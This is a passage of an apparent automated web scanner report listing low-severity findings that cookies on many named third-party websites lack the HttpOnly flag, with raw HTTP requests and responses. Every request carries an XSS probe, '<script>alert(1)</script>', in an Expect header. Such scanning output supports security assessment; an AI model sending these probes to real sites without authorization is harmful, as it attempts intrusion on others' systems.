Set-Cookie: UserIdentifier=607b67c1-87b5-4034-9ce6-9ec2ef510b65; expires=Fri, 04-May-2012 03:42:24 GMT; path=/
Set-Cookie: UserSessionIdentifier=31dfe5c0-9010-4be3-a524-e17e87e7fe6c; expires=Thu, 05-May-2011 03:42:24 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:42:24 GMT
Content-Length: 0


15.27. http://www.durangoherald.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.durangoherald.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.durangoherald.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 404 Not Found
Cache-Control: no-cache, no-store, max-age=0, must-revalidate, proxy-revalidate
Content-Length: 60
Content-Type: text/html; charset=iso-8859-1
Expires: Wed, 04 May 2011 03:29:42 GMT
Last-Modified: Wed, 04 May 2011 03:29:42 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: PBCSPERMUSERID=173426077382444; path=/; expires=Wed, 02 May 2012 21:29:42 GMT
Set-Cookie: PBCSSESSIONID=173426077382444; path=/
X-Passed-To: S260608AT1VW728, URL Rewrite on site N/A (2011-05-03 23:29:42:429)
X-Handled-By: S260608AT1VW728, Rewrite on site N/A
X-Actual-URL: S260608AT1VW728, (/favicon.ico)
X-Passed-To-DLL: S260608AT1VW728, (2011-05-03 23:29:42:429)
X-Passed-To-BeforeDispatch: S260608AT1VW728, on site DU (2011-05-03 23:29:42:444)
X-Returned-From-BeforeDispatch: S260608AT1VW728, on site DU (2011-05-03 23:29:42:476)
X-Passed-To-PostProcessResponse: S260608AT1VW728, on site DU (2011-05-03 23:29:42:476)
X-Returned-From-PostProcessResponse: S260608AT1VW728, on site DU (2011-05-03 23:29:42:476)
X-Returned-From-DLL: S260608AT1VW728 (2011-05-03 23:29:42:476)
X-Returned-From: S260608AT1VW728(2011-05-03 23:29:42:476)
Date: Wed, 04 May 2011 03:29:42 GMT
X-Cache: MISS from sxsquid03
X-Cache-Lookup: MISS from sxsquid03:80
Via: 1.0 sxsquid03 (squid/3.0.STABLE18)
Connection: close

<html><body><strong>404 Not Found<br></strong></body></html>

15.28. http://www.egyptair.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.egyptair.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.egyptair.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 NOT FOUND
Date: Wed, 04 May 2011 01:00:49 GMT
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6335
X-Powered-By: ASP.NET
Exires: Tue, 19 Apr 2011 01:00:49 GMT
Cache-Control: private,max-age=0
Content-Length: 13
Public-Extension: http://schemas.microsoft.com/repl-2
Set-Cookie: Commerce_TestPersistentCookie=TestCookie; expires=Thu, 05-May-2011 01:00:49 GMT; path=/
Set-Cookie: Commerce_TestSessionCookie=TestCookie; path=/
Set-Cookie: .ASPXANONYMOUS=LRfhi4hAzAEkAAAAY2ZkZTYwYjYtNDY0My00ODJkLWIyZTEtNGMwZjEzZTRkNGVi9OrfBE5WwOEiFcy6k_sgGDQKnnk1; expires=Tue, 12-Jul-2011 11:40:49 GMT; path=/; HttpOnly
Set-Cookie: presist=G8VTi1IGqTD8FCwSujhkeBs2tIdELH0ciJz7EiietcwXWULJjtZVFXg3UZnnPpJCD3fzF5VZwtnvIGg=; path=/

404 NOT FOUND

15.29. http://www.engcen.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.engcen.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.engcen.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 04:08:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 8241
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCDRTQRB=JPCCMCGACJDGOGODPJCKKOPG; path=/
Cache-control: private


<html>
<head>
<title>Engineering jobs, resumes & careers - engineers employment search</title>

<link rel="stylesheet" type="text/css" href="http://www.engcen.com/include/engcen.css">
<link rel
...[SNIP]...

15.30. http://www.essedive.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.essedive.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.essedive.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 3203
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCSCRCDDT=EELCBBAANEJGMPHMCJFMBOCG; path=/
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:12:18 GMT


<html>

<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title></title>
</head>

<body>

<div align="
...[SNIP]...

15.31. http://www.expertrating.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.expertrating.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.expertrating.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object moved
Date: Wed, 04 May 2011 02:07:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /404-Not-found.asp
Content-Length: 139
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQAQQSSRT=JOLBPIEAPELAHGADNMKBDJIE; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/404-Not-found.asp">here</a>.</body>

15.32. http://www.family.org/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.family.org
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.family.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object moved
Connection: keep-alive
Date: Wed, 04 May 2011 01:33:17 GMT
Server: Microsoft-IIS/6.0
ID: w2
X-Powered-By: ASP.NET
Location: /404/
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQAATDCA=ANLJDCODACLOLDJHBKPPEEEI; path=/
Cache-control: private
Set-Cookie: BIGipServerpool_INT_family.org.cf-only-http=3523547308.20480.0000; path=/
Content-Length: 126

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/404/">here</a>.</body>

15.33. http://www.fancydress.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.fancydress.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fancydress.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved
Server: nginx/0.7.65
Date: Wed, 04 May 2011 03:36:27 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: ad_session_id=1149333760%2c0%2c0+%7b420+1304477871+0C2C6CD61390BC921FC6C434E5C949FF0D472538%7d; Path=/; Max-Age=1200; Expires=Wed, 04-May-2011 02:57:51 GMT
Location: /costumes/
MIME-Version: 1.0
Content-Length: 357


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML>
<HEAD>
<TITLE>Moved</TITLE>
</HEAD>
<BODY>
<H2>Moved</H2>
<A HREF="/costumes/
...[SNIP]...

15.34. http://www.fhainfo.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.fhainfo.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fhainfo.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 00:41:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 19564
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCARQRAQ=FMFPCJEAGBIKDFKPJABOFIDH; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<meta name="keywords" content="fha mortgage insurnace, MIP, MMI, PMI, fha mortgage insurance, loan requirements,fha annual
...[SNIP]...

15.35. http://www.henryfields.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.henryfields.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.henryfields.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object moved
Date: Wed, 04 May 2011 02:51:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /default.asp
Content-Length: 133
Content-Type: text/html
Expires: Wed, 04 May 2011 02:51:36 GMT
Set-Cookie: ASPSESSIONIDCCRQCDTC=AHIBAJNDFNMPAGJNPAJJGNBH; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/default.asp">here</a>.</body>

15.36. http://www.hitsyndication.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.hitsyndication.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hitsyndication.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.5
Set-Cookie: PHPSESSID=e4bd9b8422bee5c6ff507e9bf89efe17; path=/; domain=www.hitsyndication.com
Set-Cookie: aid=3667; expires=Sun, 03-Jul-2011 03:02:04 GMT; path=/; domain=hitsyndication.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Content-Type: image/x-icon
Content-Length: 0
Date: Wed, 04 May 2011 03:02:04 GMT
Server: lighttpd/1.4.26


15.37. http://www.hotelguide.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.hotelguide.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hotelguide.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=91C09431300AE28D2D381B824147CBC8; Path=/
ETag: W/"1150-1302690707000"
Last-Modified: Wed, 13 Apr 2011 10:31:47 GMT
Content-Length: 1150
Date: Wed, 04 May 2011 01:31:22 GMT
Server: JBoss 4.2

............ .h.......(....... ..... ....................................................q...`...M...6........................5...%..........................{...k...S...=...(................G...<.../
...[SNIP]...

15.38. http://www.hottiearcade.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.hottiearcade.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hottiearcade.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=785CD3FAF03B9EFE95A34B64BB9EC6D2; Path=/
ETag: W/"8894-1257474753000"
Last-Modified: Fri, 06 Nov 2009 02:32:33 GMT
Content-Type: image/x-icon
Content-Length: 8894
Date: Wed, 04 May 2011 02:00:58 GMT

............ .."......(.......\..... ......"............................................................................................................................................................
...[SNIP]...

15.39. http://www.hughesnet60.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.hughesnet60.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hughesnet60.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Moved permanently
Connection: close
Date: Wed, 04 May 2011 00:58:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=65054203;expires=Fri, 26-Apr-2041 00:58:00 GMT;path=/
Set-Cookie: CFTOKEN=67656445;expires=Fri, 26-Apr-2041 00:58:00 GMT;path=/
Set-Cookie: MID=;path=/
Set-Cookie: MID=;expires=Fri, 26-Apr-2041 00:58:00 GMT;path=/
Set-Cookie: MID=05141HN60;domain=hughesnet.com;expires=Fri, 26-Apr-2041 00:58:00 GMT;path=/
Set-Cookie: MID=05141HN60;domain=hughesnet.com;expires=Fri, 26-Apr-2041 00:58:00 GMT;path=/
Location: 404.htm
Content-Type: text/html; charset=UTF-8


15.40. http://www.huntermtn.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.huntermtn.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.huntermtn.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:27:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: LM_USER_LANGUAGE_PREFERENCE=en; expires=Fri, 04-May-2012 01:27:45 GMT; path=/
Set-Cookie: ASP.NET_SessionId=32icitiwdl02j42xrguoyqzk; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11241


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <title>Hun
...[SNIP]...

15.41. http://www.imagepix.org/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.imagepix.org
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.imagepix.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Wed, 04 May 2011 03:15:37 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: PHPSESSID=h78thm00s0hn3k1ugucm8cpru6; expires=Wed, 04-May-2011 06:02:17 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 7236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="ru" xml:lang="ru">

...[SNIP]...

15.42. http://www.imshopping.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.imshopping.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.imshopping.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Wed, 04 May 2011 02:44:16 GMT
Content-Type: image/x-icon
Connection: keep-alive
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=8dqc5x5kym9j;Path=/
Expires: Wed, 11 May 2011 02:44:16 GMT
Cache-Control: max-age=604800
Content-Length: 1406
Last-Modified: Mon, 23 Nov 2009 14:31:42 GMT

..............h.......(....... .................................r.......b...X...p.......[...[.......[...^...............Y...Y...Y.......Y...\...q...g...............l.......Z...]...Z...]...]...e.......
...[SNIP]...

15.43. http://www.inautix.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.inautix.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.inautix.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Pershing LLC
Date: Wed, 04 May 2011 01:39:23 GMT
Set-Cookie: JSESSIONID=3D76E0F5DA1F23D742B618B8DC0EF710; Path=/cps
Set-Cookie: RedDotLiveServerSessionID_inautix=SID-7997F859-ED5AF4F9; Path=/
MASTERWEBLET: CACHED
Expires: Wed, 04 May 2011 01:36:00 GMT
Date: Wed, 04 May 2011 01:36:00 GMT
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 13484

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><!-- PageID 1952 - published
...[SNIP]...

15.44. http://www.infowarsshop.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.infowarsshop.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.infowarsshop.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 03:03:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 0
Content-Type: text/html
Set-Cookie: referer=; expires=Wed, 02-May-2012 04:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCSASATBS=MLJBOADABKMGDHAAINOHGKBD; path=/
Cache-control: private


15.45. http://www.instrumentalsavings.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.instrumentalsavings.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.instrumentalsavings.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 01:56:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1643
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCTSQRBB=JPNIBNODJPIDOMGBPLONNMBF; path=/
Cache-control: private
Vary: Accept-Encoding, User-Agent


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head><title>The page cannot be found</title>
<meta http-equiv="Content-Type" content="text/htm
...[SNIP]...

15.46. http://www.jcpenneyoptical.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.jcpenneyoptical.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jcpenneyoptical.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 03:17:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 11007
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSRCSQCC=KEKJLINDKCHKNAMLHONBKFFJ; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

15.47. http://www.kgoam810.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.kgoam810.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kgoam810.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:48:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NON DSP COR OTPa OUR IND OTC"
Content-Length: 72
Content-Type: text/html
Set-Cookie: SiteUserIsBot=0; path=/
Set-Cookie: ASPSESSIONIDAQSSAAQC=JKGKHNDAMECAHBDGPOLOHLAJ; path=/
Cache-control: private
Set-Cookie: NSC_LHP=ffffffff09021f3045525d5f4f58455e445a4a42222f;path=/

<br>Error, file not found: 404;http://www.kgoam810.com:5151/favicon.ico

15.48. http://www.kontrolfreek.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.kontrolfreek.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kontrolfreek.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18615
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDSQABRACT=JCJFOKFAOAJNIGBNOEGNJGBI; path=/
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:13:30 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Xbox 360 & PS3
...[SNIP]...

15.49. http://www.linkchina.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.linkchina.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.linkchina.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 /favicon.ico
Server: nginx/0.7.14
Date: Wed, 04 May 2011 03:07:57 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=CC8AC59D1031016BC6722B6D9B801B12; Path=/
Content-Length: 36362


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="pr
...[SNIP]...

15.50. http://www.lol-jokes.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.lol-jokes.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lol-jokes.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 02:42:15 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Server: Apache/Nginx/Varnish
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=1e11cc5fdd7922098b1869d2ed387b53; expires=Fri, 27-May-2011 06:15:32 GMT; path=/
Last-Modified: Wed, 20 Oct 2010 09:54:46 GMT
ETag: "79111cf2abb5675b4c433e5f9a3e8460"
Cache-Control: max-age=1
Expires: Wed, 04 May 2011 02:42:16 GMT
Vary: Accept-Encoding
Content-Length: 19390
Accept-Ranges: bytes
Age: 0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
